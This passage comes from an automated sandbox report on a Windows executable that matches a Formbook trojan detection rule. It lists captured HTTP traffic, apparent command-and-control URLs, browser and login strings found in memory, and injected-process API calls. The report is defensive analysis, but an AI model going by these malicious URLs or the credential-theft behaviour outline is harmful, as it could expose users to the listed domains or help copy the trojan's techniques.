Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:58:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:58:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:58:42 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:58:45 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: UOIRaMZSIyDCj.exe, 00000006.00000002.3764542143.00000000045AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nobartv6.website/pp43/?0th4S=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu
            Source: UOIRaMZSIyDCj.exe, 00000006.00000002.3766348701.0000000005399000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sailnway.net
            Source: UOIRaMZSIyDCj.exe, 00000006.00000002.3766348701.0000000005399000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sailnway.net/lrst/
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.3759956328.000000000301E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.1798800633.0000000007F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000004.00000002.3759956328.000000000301E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: netbtugc.exe, 00000004.00000002.3759956328.000000000301E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.3759956328.000000000301E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.3759956328.000000000301E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.3759956328.000000000301E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000002.3765472175.00000000048C0000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000002.3764542143.0000000003C40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.3765472175.0000000004278000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000002.3764542143.00000000035F8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1911667018.000000001EFA8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6
            Source: netbtugc.exe, 00000004.00000002.3765472175.00000000048C0000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000002.3764542143.0000000003C40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1505608975.0000000002B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1506786583.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1505236600.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3764618447.0000000002A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1505608975.0000000002B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1506786583.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1505236600.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3764618447.0000000002A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C063 NtClose,2_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B4340 NtSetContextThread,LdrInitializeThunk,4_2_035B4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B4650 NtSuspendThread,LdrInitializeThunk,4_2_035B4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2B60 NtClose,LdrInitializeThunk,4_2_035B2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_035B2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_035B2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_035B2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2AD0 NtReadFile,LdrInitializeThunk,4_2_035B2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2AF0 NtWriteFile,LdrInitializeThunk,4_2_035B2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2F30 NtCreateSection,LdrInitializeThunk,4_2_035B2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2FE0 NtCreateFile,LdrInitializeThunk,4_2_035B2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2FB0 NtResumeThread,LdrInitializeThunk,4_2_035B2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_035B2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_035B2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_035B2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_035B2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2DD0 NtDelayExecution,LdrInitializeThunk,4_2_035B2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_035B2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_035B2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2C60 NtCreateKey,LdrInitializeThunk,4_2_035B2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_035B2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B35C0 NtCreateMutant,LdrInitializeThunk,4_2_035B35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B39B0 NtGetContextThread,LdrInitializeThunk,4_2_035B39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2B80 NtQueryInformationFile,4_2_035B2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2AB0 NtWaitForSingleObject,4_2_035B2AB0
